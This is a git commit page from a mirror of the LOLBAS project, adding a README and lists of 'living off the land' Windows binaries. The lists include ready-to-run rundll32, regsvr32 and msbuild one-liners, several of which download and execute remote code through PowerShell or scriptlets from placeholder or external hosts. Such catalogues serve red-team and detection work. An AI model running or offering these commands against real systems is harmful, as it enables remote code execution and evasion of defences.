infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Framework

master
api0cradle 2018-04-18 12:05:49 +02:00
parent da465edea4
commit c66ed29053
3 changed files with 64 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
LOLBins.md Normal file
View File

@ -0,0 +1,48 @@
# LOLBins - Living Off The Land Binaries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS BINARIES
## Rundll32.exe
* Functions: Execute code
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
rundll32 shell32.dll,Control_RunDLL payload.dll
```
Acknowledgements:
* @subtee
## Regsvr32.exe
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
```
Acknowledgements:
* @subtee
## Msbuild.exe
```
msbuild.exe pshell.xml
```
Acknowledgements:
* @subtee

7
LOLScripts.md Normal file
View File

@ -0,0 +1,7 @@
# LOLScripts - Living Off The Land Scripts
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS SCRIPTS

11
README.md
View File

@ -1,2 +1,9 @@
# LOLBAS
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
# Living Off The Land Binaries and Scripts
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
There are two different lists.
[LOLBins.MD]
[LOLScripts.MD]